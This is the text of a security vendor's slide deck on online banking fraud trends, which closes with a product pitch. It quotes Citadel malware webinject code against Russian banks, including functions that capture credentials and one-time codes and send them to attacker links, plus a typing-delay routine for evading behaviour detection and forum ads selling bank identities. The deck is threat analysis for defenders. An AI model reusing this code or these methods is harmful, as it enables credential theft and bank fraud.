Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
Online Fraud: Threats & Trends
Ziv Cohen
Director, EMEA Sales
Trusteer Confidential 2012 ©
Criminals Attack the Weak Link With Malware
2
Customer Accounts
Cyber Criminals
Difficult
Easy
Easy
Retail/Business Customer
Trusteer Confidential 2013 ©
Protect Your Investment
Two emerging trends for malware:
Back to the basics tactics: reviving old techniques to bypass security solutions
Malware security: investing in malware protection from: - Malware detection systems
- Anomaly detection systems
- Behavior profiling systems
- Device ID solutions
- And more…
Cybercrime forum trends – more services that help outsource technical aspects of fraud
3
Trusteer Confidential 2013 ©
Evading Detection (Wrapper)
4
Trusteer Confidential 2013 ©
Evading Detection
5
Trusteer Confidential 2012 ©
Undetectable to AVs
6
Trusteer Confidential 2012 ©
Undetectable to AVs
7
Trusteer Confidential 2013 ©
Bypassing Device ID (RDP)
Notification
Login
Injection
Trusteer Confidential 2013 ©
Bypassing Device ID (RDP)
RDP
Transaction
Trusteer Confidential 2013 ©
Bypassing Device ID
Trusteer Confidential 2013 ©
Behavior Anomaly Evasion
slow_fill = function(id, text) { var i=1; beepInput(id); var thread=setInterval( function() { id.value=text.substr(0,i); i++; if (i==text.length+1) { clearInterval(thread); deleteHelpMessage(); } } , 200); }
Trusteer Confidential 2013 ©
Russian Banks Targeted by Malware
12
The attacker:
Citadel – a descendant of Zeus
MITB functionality
The targets:
VTB24 (/WebNew/login.aspx)
Russian Standard Bank (rsb.ru)
Avangard Bank (avangard.ru)
The method:
Steal credentials
Steal OTPs
HTML Injection
Real time victim-to-cybercriminal communications
Trusteer Confidential 2013 ©
Example of attack flow
13
Capture credentials in real time
The malware checks the credentials validity
Communicate with the user
Credentials are sent to the C&C in real time via Jabber
Cybercriminal logs in using the credentials, after pausing the victim
<WebInject> <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before> <After><![CDATA[]]></After> <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data> </WebInject>
function Check(){ if(login.value.length > 3 && pass.value.length > 3) { write_c('login',login.value,3); write_c('pass',pass.value,3); check_block(); } }
Пожалуйста , ожидайте . Происходит Авторизация!
function KnockToAdmin() {var link = log_link+"?log="+read_c('login')+"&pass="+read_c('pass')+"&tan="+tan.value; GetDataACD_knock_to_admin(link); } function SendMsg(msg) { var link = jabb_link+'?log='+msg; GetDataACD_sendmsg(link); }
function WaitForBlock() { var link = admin_logs+read_c('login')+'/block.me'; GetDataACD_WaitForBlock(link); } function WaitForNextCode() { var link = admin_logs+read_c('login')+'/kod.2'; GetDataACD_WaitForNextCode(link); } function WaitForFreeUse() { var link = admin_logs+read_c('login')+'/free.use'; GetDataACD_WaitForFreeUse(link); } function OnLoadACD_check_block() {
Trusteer Confidential 2013 ©
Fraud as a Service An Identity is Born
Trusteer Confidential 2013 ©
Fraud as a Service Create A New Account
Selling bank accounts packages: • Bank account information + ATM card • Online banking credentials • Official documents (including passports) • Price: 12,000 Ruble (~$360) Also offering a cashout service for a 5% fee
Trusteer Confidential 2013 ©
Fraud as a Service
"Will buy a Corporate identity in one of the following countries" A corporate identity is an identity, online or real, which is authorized to perform changes and transfers in a corporate bank account.
I'm interested in credentials. Can be mixed countries, with United Arab Emirates, also interested in Poland, Italy, Netherlands
Trusteer Confidential 2013 ©
Too Lazy?
18
Trusteer Confidential 2013 ©
Security Silos FAIL!
Trusteer Confidential 2013 © 20
Holistic Approach for Cybercrime
WWW
Phishing and Malware Fraud
Advanced Threats (Employees)
Online/Mobile Banking
Money, Intellectual Property, Business Data
Account Takeover, New Account Fraud
Mobile Fraud Risk
Trusteer Confidential 2013 ©
Trusteer Cybercrime Prevention Architecture
Compact software agent that prevents malware and Phishing attacks
Endpoint solutions for detecting malware, jailbreak, and other mobile risk factors
Out-of-Band Authentication
100% accurate clientless detection of active MitB malware on users’ devices
Conclusive criminal access detection by correlating device fingerprint and account compromise history
Trusteer Rapport PC/Mac
Trusteer Mobile iOS, Android
Trusteer Pinpoint Malware Detection
Trusteer Pinpoint ATO Detection
Centralized Management, Alerting, Reporting
21
Thank You